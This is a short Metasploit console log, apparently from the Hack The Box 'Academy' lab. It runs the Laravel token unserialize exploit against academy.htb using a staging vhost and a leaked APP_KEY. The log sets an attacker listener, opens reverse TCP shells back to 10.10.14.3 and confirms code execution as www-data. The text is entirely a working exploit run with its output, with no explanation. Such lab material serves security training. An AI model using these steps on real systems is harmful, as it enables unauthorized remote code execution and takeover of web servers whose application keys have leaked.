msf6 > use exploit/unix/http/laravel_token_unserialize_exec
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set rhosts academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set vhost dev-staging-01.academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set app_key dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set lhost 10.10.14.3
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.215:51084) at 2020-12-07 12:47:57 +0100
[*] Command shell session 2 opened (10.10.14.3:4444 -> 10.10.10.215:51086) at 2020-12-07 12:47:58 +0100
whoami
www-data